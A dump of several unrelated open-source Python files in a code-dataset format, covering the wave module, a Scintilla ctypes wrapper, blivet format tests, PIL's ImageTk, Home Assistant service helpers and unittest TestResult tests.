def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Wave_read(f)
elif mode in ('w', 'wb'):
return Wave_write(f)
else:
raise Error, "mode must be 'r', 'rb', 'w', or 'wb'"
openfp = open # B/W compatibility
| gpl-3.0 |
cuavas/bgfx | 3rdparty/scintilla/test/ScintillaCallable.py | 68 | 4970 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import ctypes, os, sys
from ctypes import c_int, c_ulong, c_char_p, c_wchar_p, c_ushort, c_uint, c_long
class TEXTRANGE(ctypes.Structure):
_fields_= (\
('cpMin', c_long),
('cpMax', c_long),
('lpstrText', ctypes.POINTER(ctypes.c_char)),
)
class FINDTEXT(ctypes.Structure):
_fields_= (\
('cpMin', c_long),
('cpMax', c_long),
('lpstrText', c_char_p),
('cpMinText', c_long),
('cpMaxText', c_long),
)
class SciCall:
def __init__(self, fn, ptr, msg, stringResult=False):
self._fn = fn
self._ptr = ptr
self._msg = msg
self._stringResult = stringResult
def __call__(self, w=0, l=0):
ww = ctypes.cast(w, c_char_p)
if self._stringResult:
lengthBytes = self._fn(self._ptr, self._msg, ww, None)
if lengthBytes == 0:
return bytearray()
result = (ctypes.c_byte * lengthBytes)(0)
lengthBytes2 = self._fn(self._ptr, self._msg, ww, ctypes.cast(result, c_char_p))
assert lengthBytes == lengthBytes2
return bytearray(result)[:lengthBytes]
else:
ll = ctypes.cast(l, c_char_p)
return self._fn(self._ptr, self._msg, ww, ll)
sciFX = ctypes.CFUNCTYPE(c_long, c_char_p, c_int, c_char_p, c_char_p)
class ScintillaCallable:
def __init__(self, face, scifn, sciptr):
self.__dict__["face"] = face
self.__dict__["used"] = set()
self.__dict__["all"] = set()
# The k member is for accessing constants as a dictionary
self.__dict__["k"] = {}
for f in face.features:
self.all.add(f)
if face.features[f]["FeatureType"] == "val":
self.k[f] = int(self.face.features[f]["Value"], 0)
elif face.features[f]["FeatureType"] == "evt":
self.k["SCN_"+f] = int(self.face.features[f]["Value"], 0)
scifn = sciFX(scifn)
self.__dict__["_scifn"] = scifn
self.__dict__["_sciptr"] = sciptr
def __getattr__(self, name):
if name in self.face.features:
self.used.add(name)
feature = self.face.features[name]
value = int(feature["Value"], 0)
#~ print("Feature", name, feature)
if feature["FeatureType"] == "val":
self.__dict__[name] = value
return value
else:
if feature["Param2Type"] == "stringresult" and \
name not in ["GetText", "GetLine", "GetCurLine"]:
return SciCall(self._scifn, self._sciptr, value, True)
else:
return SciCall(self._scifn, self._sciptr, value)
elif ("Get" + name) in self.face.features:
self.used.add("Get" + name)
feature = self.face.features["Get" + name]
value = int(feature["Value"], 0)
if feature["FeatureType"] == "get" and \
not name.startswith("Get") and \
not feature["Param1Type"] and \
not feature["Param2Type"] and \
feature["ReturnType"] in ["bool", "int", "position"]:
#~ print("property", feature)
return self._scifn(self._sciptr, value, None, None)
elif name.startswith("SCN_") and name in self.k:
self.used.add(name)
feature = self.face.features[name[4:]]
value = int(feature["Value"], 0)
#~ print("Feature", name, feature)
if feature["FeatureType"] == "val":
return value
raise AttributeError(name)
def __setattr__(self, name, val):
if ("Set" + name) in self.face.features:
self.used.add("Set" + name)
feature = self.face.features["Set" + name]
value = int(feature["Value"], 0)
#~ print("setproperty", feature)
if feature["FeatureType"] == "set" and not name.startswith("Set"):
if feature["Param1Type"] in ["bool", "int", "position"]:
return self._scifn(self._sciptr, value, c_char_p(val), None)
elif feature["Param2Type"] in ["string"]:
return self._scifn(self._sciptr, value, None, c_char_p(val))
raise AttributeError(name)
raise AttributeError(name)
def getvalue(self, name):
if name in self.face.features:
feature = self.face.features[name]
if feature["FeatureType"] != "evt":
try:
return int(feature["Value"], 0)
except ValueError:
return -1
return -1
def ByteRange(self, start, end):
tr = TEXTRANGE()
tr.cpMin = start
tr.cpMax = end
length = end - start
tr.lpstrText = ctypes.create_string_buffer(length + 1)
self.GetTextRange(0, ctypes.byref(tr))
text = tr.lpstrText[:length]
text += b"\0" * (length - len(text))
return text
def StyledTextRange(self, start, end):
tr = TEXTRANGE()
tr.cpMin = start
tr.cpMax = end
length = 2 * (end - start)
tr.lpstrText = ctypes.create_string_buffer(length + 2)
self.GetStyledText(0, ctypes.byref(tr))
styledText = tr.lpstrText[:length]
styledText += b"\0" * (length - len(styledText))
return styledText
def FindBytes(self, start, end, s, flags):
ft = FINDTEXT()
ft.cpMin = start
ft.cpMax = end
ft.lpstrText = s
ft.cpMinText = 0
ft.cpMaxText = 0
pos = self.FindText(flags, ctypes.byref(ft))
#~ print(start, end, ft.cpMinText, ft.cpMaxText)
return pos
def Contents(self):
return self.ByteRange(0, self.Length)
def SetContents(self, s):
self.TargetStart = 0
self.TargetEnd = self.Length
self.ReplaceTarget(len(s), s)
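# Editor's sketch (hypothetical face/fn/ptr values, not part of the original
# file): how attribute access resolves through __getattr__/__setattr__ above.
#
#   sci = ScintillaCallable(face, scifn, sciptr)
#   sci.SetContents(b"hello")   # helper method defined above
#   n = sci.Length              # resolved via the "Get" + name property branch
#   text = sci.Contents()       # ByteRange(0, Length)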
| bsd-2-clause |
rvykydal/blivet | tests/formats_test/device_test.py | 6 | 3185 | import unittest
import blivet
class DeviceFormatTestCase(unittest.TestCase):
def test_formats(self):
absolute_path = "/abs/path"
host_path = "host:path"
garbage = "abc#<def>"
for fclass in blivet.formats.device_formats.values():
an_fs = fclass()
# all formats accept None for device
try:
an_fs.device = None
except ValueError:
raise self.failureException("ValueError raised")
# NoDevFS accepts anything
if isinstance(an_fs, blivet.formats.fs.NoDevFS):
try:
an_fs.device = absolute_path
an_fs.device = host_path
an_fs.device = garbage
an_fs.device = ""
except ValueError:
raise self.failureException("ValueError raised")
elif isinstance(an_fs, blivet.formats.fs.NFS):
try:
an_fs.device = host_path
except ValueError:
raise self.failureException("ValueError raised")
with self.assertRaises(ValueError):
an_fs.device = absolute_path
with self.assertRaises(ValueError):
an_fs.device = garbage
with self.assertRaises(ValueError):
an_fs.device = ""
else:
try:
an_fs.device = absolute_path
an_fs.device = ""
except ValueError:
raise self.failureException("ValueError raised")
with self.assertRaises(ValueError):
an_fs.device = host_path
with self.assertRaises(ValueError):
an_fs.device = garbage
class DeviceValueTestCase(unittest.TestCase):
def test_value(self):
for fclass in blivet.formats.device_formats.values():
an_fs = fclass()
if isinstance(an_fs, blivet.formats.fs.TmpFS):
# type == device == _type == _device == "tmpfs" always
vals = [an_fs.type, an_fs.device, an_fs._type, an_fs._device]
self.assertTrue(all(x == "tmpfs" for x in vals))
an_fs.device = "new"
self.assertTrue(all(x == "tmpfs" for x in vals))
elif isinstance(an_fs, blivet.formats.fs.NoDevFS):
# type == device == _type == _device
vals = [an_fs.type, an_fs.device, an_fs._device]
self.assertTrue(all(x == an_fs._type for x in vals))
an_fs.device = "new"
# _type is unchanged, but type, device, _device have new value
self.assertNotEqual(an_fs._type, "new")
vals = [an_fs.type, an_fs.device, an_fs._device]
self.assertTrue(all(x == "new" for x in vals))
else:
# other formats are straightforward
typ = an_fs.type
an_fs.device = "/abc:/def"
self.assertEqual(an_fs.type, typ)
self.assertEqual(an_fs.device, "/abc:/def")
| lgpl-2.1 |
WillisXChen/django-oscar | oscar/lib/python2.7/site-packages/PIL/ImageTk.py | 46 | 9108 | #
# The Python Imaging Library.
# $Id$
#
# a Tk display interface
#
# History:
# 96-04-08 fl Created
# 96-09-06 fl Added getimage method
# 96-11-01 fl Rewritten, removed image attribute and crop method
# 97-05-09 fl Use PyImagingPaste method instead of image type
# 97-05-12 fl Minor tweaks to match the IFUNC95 interface
# 97-05-17 fl Support the "pilbitmap" booster patch
# 97-06-05 fl Added file= and data= argument to image constructors
# 98-03-09 fl Added width and height methods to Image classes
# 98-07-02 fl Use default mode for "P" images without palette attribute
# 98-07-02 fl Explicitly destroy Tkinter image objects
# 99-07-24 fl Support multiple Tk interpreters (from Greg Couch)
# 99-07-26 fl Automatically hook into Tkinter (if possible)
# 99-08-15 fl Hook uses _imagingtk instead of _imaging
#
# Copyright (c) 1997-1999 by Secret Labs AB
# Copyright (c) 1996-1997 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
try:
import tkinter
except ImportError:
import Tkinter
tkinter = Tkinter
del Tkinter
from PIL import Image
# --------------------------------------------------------------------
# Check for Tkinter interface hooks
_pilbitmap_ok = None
def _pilbitmap_check():
global _pilbitmap_ok
if _pilbitmap_ok is None:
try:
im = Image.new("1", (1, 1))
tkinter.BitmapImage(data="PIL:%d" % im.im.id)
_pilbitmap_ok = 1
except tkinter.TclError:
_pilbitmap_ok = 0
return _pilbitmap_ok
# --------------------------------------------------------------------
# PhotoImage
class PhotoImage(object):
"""
A Tkinter-compatible photo image. This can be used
everywhere Tkinter expects an image object. If the image is an RGBA
image, pixels having alpha 0 are treated as transparent.
The constructor takes either a PIL image, or a mode and a size.
Alternatively, you can use the **file** or **data** options to initialize
the photo image object.
:param image: Either a PIL image, or a mode string. If a mode string is
used, a size must also be given.
:param size: If the first argument is a mode string, this defines the size
of the image.
:keyword file: A filename to load the image from (using
``Image.open(file)``).
:keyword data: An 8-bit string containing image data (as loaded from an
image file).
"""
def __init__(self, image=None, size=None, **kw):
# Tk compatibility: file or data
if image is None:
if "file" in kw:
image = Image.open(kw["file"])
del kw["file"]
elif "data" in kw:
from io import BytesIO
image = Image.open(BytesIO(kw["data"]))
del kw["data"]
if hasattr(image, "mode") and hasattr(image, "size"):
# got an image instead of a mode
mode = image.mode
if mode == "P":
# palette mapped data
image.load()
try:
mode = image.palette.mode
except AttributeError:
mode = "RGB" # default
size = image.size
kw["width"], kw["height"] = size
else:
mode = image
image = None
if mode not in ["1", "L", "RGB", "RGBA"]:
mode = Image.getmodebase(mode)
self.__mode = mode
self.__size = size
self.__photo = tkinter.PhotoImage(**kw)
self.tk = self.__photo.tk
if image:
self.paste(image)
def __del__(self):
name = self.__photo.name
self.__photo.name = None
try:
self.__photo.tk.call("image", "delete", name)
except:
pass # ignore internal errors
def __str__(self):
"""
Get the Tkinter photo image identifier. This method is automatically
called by Tkinter whenever a PhotoImage object is passed to a Tkinter
method.
:return: A Tkinter photo image identifier (a string).
"""
return str(self.__photo)
def width(self):
"""
Get the width of the image.
:return: The width, in pixels.
"""
return self.__size[0]
def height(self):
"""
Get the height of the image.
:return: The height, in pixels.
"""
return self.__size[1]
def paste(self, im, box=None):
"""
Paste a PIL image into the photo image. Note that this can
be very slow if the photo image is displayed.
:param im: A PIL image. The size must match the target region. If the
mode does not match, the image is converted to the mode of
the bitmap image.
:param box: A 4-tuple defining the left, upper, right, and lower pixel
coordinate. If None is given instead of a tuple, all of
the image is assumed.
"""
# convert to blittable
im.load()
image = im.im
if image.isblock() and im.mode == self.__mode:
block = image
else:
block = image.new_block(self.__mode, im.size)
image.convert2(block, image) # convert directly between buffers
tk = self.__photo.tk
try:
tk.call("PyImagingPhoto", self.__photo, block.id)
except tkinter.TclError:
# activate Tkinter hook
try:
from PIL import _imagingtk
try:
_imagingtk.tkinit(tk.interpaddr(), 1)
except AttributeError:
_imagingtk.tkinit(id(tk), 0)
tk.call("PyImagingPhoto", self.__photo, block.id)
except (ImportError, AttributeError, tkinter.TclError):
raise # configuration problem; cannot attach to Tkinter
# --------------------------------------------------------------------
# BitmapImage
class BitmapImage(object):
"""
A Tkinter-compatible bitmap image. This can be used everywhere Tkinter
expects an image object.
The given image must have mode "1". Pixels having value 0 are treated as
transparent. Options, if any, are passed on to Tkinter. The most commonly
used option is **foreground**, which is used to specify the color for the
non-transparent parts. See the Tkinter documentation for information on
how to specify colours.
:param image: A PIL image.
"""
def __init__(self, image=None, **kw):
# Tk compatibility: file or data
if image is None:
if "file" in kw:
image = Image.open(kw["file"])
del kw["file"]
elif "data" in kw:
from io import BytesIO
image = Image.open(BytesIO(kw["data"]))
del kw["data"]
self.__mode = image.mode
self.__size = image.size
if _pilbitmap_check():
# fast way (requires the pilbitmap booster patch)
image.load()
kw["data"] = "PIL:%d" % image.im.id
self.__im = image # must keep a reference
else:
# slow but safe way
kw["data"] = image.tobitmap()
self.__photo = tkinter.BitmapImage(**kw)
def __del__(self):
name = self.__photo.name
self.__photo.name = None
try:
self.__photo.tk.call("image", "delete", name)
except:
pass # ignore internal errors
def width(self):
"""
Get the width of the image.
:return: The width, in pixels.
"""
return self.__size[0]
def height(self):
"""
Get the height of the image.
:return: The height, in pixels.
"""
return self.__size[1]
def __str__(self):
"""
Get the Tkinter bitmap image identifier. This method is automatically
called by Tkinter whenever a BitmapImage object is passed to a Tkinter
method.
:return: A Tkinter bitmap image identifier (a string).
"""
return str(self.__photo)
def getimage(photo):
"""Copies the contents of a PhotoImage to a PIL image memory."""
photo.tk.call("PyImagingPhotoGet", photo)
# --------------------------------------------------------------------
# Helper for the Image.show method.
def _show(image, title):
class UI(tkinter.Label):
def __init__(self, master, im):
if im.mode == "1":
self.image = BitmapImage(im, foreground="white", master=master)
else:
self.image = PhotoImage(im, master=master)
tkinter.Label.__init__(self, master, image=self.image,
bg="black", bd=0)
if not tkinter._default_root:
raise IOError("tkinter not initialized")
top = tkinter.Toplevel()
if title:
top.title(title)
UI(top, image).pack()
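# Editor's sketch (hypothetical, not part of PIL; Python 3 tkinter naming
# assumed): displaying a PIL image through the PhotoImage wrapper above.
#
#   import tkinter
#   from PIL import Image, ImageTk
#   root = tkinter.Tk()
#   im = Image.new("RGB", (64, 64), "red")
#   photo = ImageTk.PhotoImage(im)
#   tkinter.Label(root, image=photo).pack()
#   root.mainloop()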
| bsd-3-clause |
jawilson/home-assistant | homeassistant/helpers/service.py | 1 | 3578 | """Service calling related helpers."""
import functools
import logging
# pylint: disable=unused-import
from typing import Optional # NOQA
import voluptuous as vol
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant # NOQA
from homeassistant.exceptions import TemplateError
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
HASS = None # type: Optional[HomeAssistant]
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
def service(domain, service_name):
"""Decorator factory to register a service."""
def register_service_decorator(action):
"""Decorator to register a service."""
HASS.services.register(domain, service_name,
functools.partial(action, HASS))
return action
return register_service_decorator
def call_from_config(hass, config, blocking=False, variables=None,
validate_config=True):
"""Call a service based on a config hash."""
if validate_config:
try:
config = cv.SERVICE_SCHEMA(config)
except vol.Invalid as ex:
_LOGGER.error("Invalid config for calling service: %s", ex)
return
if CONF_SERVICE in config:
domain_service = config[CONF_SERVICE]
else:
try:
config[CONF_SERVICE_TEMPLATE].hass = hass
domain_service = config[CONF_SERVICE_TEMPLATE].render(variables)
domain_service = cv.service(domain_service)
except TemplateError as ex:
_LOGGER.error('Error rendering service name template: %s', ex)
return
except vol.Invalid as ex:
_LOGGER.error('Template rendered invalid service: %s',
domain_service)
return
domain, service_name = domain_service.split('.', 1)
service_data = dict(config.get(CONF_SERVICE_DATA, {}))
def _data_template_creator(value):
"""Recursive template creator helper function."""
if isinstance(value, list):
for idx, element in enumerate(value):
value[idx] = _data_template_creator(element)
return value
if isinstance(value, dict):
for key, element in value.items():
value[key] = _data_template_creator(element)
return value
value.hass = hass
return value.render(variables)
if CONF_SERVICE_DATA_TEMPLATE in config:
for key, value in config[CONF_SERVICE_DATA_TEMPLATE].items():
service_data[key] = _data_template_creator(value)
if CONF_SERVICE_ENTITY_ID in config:
service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
hass.services.call(domain, service_name, service_data, blocking)
def extract_entity_ids(hass, service_call):
"""Helper method to extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
"""
if not (service_call.data and ATTR_ENTITY_ID in service_call.data):
return []
group = get_component('group')
# Entity ID attr can be a list or a string
service_ent_id = service_call.data[ATTR_ENTITY_ID]
if isinstance(service_ent_id, str):
return group.expand_entity_ids(hass, [service_ent_id])
return [ent_id for ent_id in group.expand_entity_ids(hass, service_ent_id)]
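# Editor's sketch (hypothetical service/entity names, not part of the original
# file): the shape of a config hash accepted by call_from_config().
#
#   config = {
#       'service': 'light.turn_on',
#       'entity_id': 'light.kitchen',
#       'data': {'brightness': 255},
#   }
#   call_from_config(hass, config, blocking=True)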
| mit |
40023255/2015cd_0505 | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_result.py | 788 | 19069 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
    def testOldTestResultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| agpl-3.0 |
cliqz/socorro | socorro/unittest/processor/test_legacy_new_crash_source.py | 13 | 10751 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
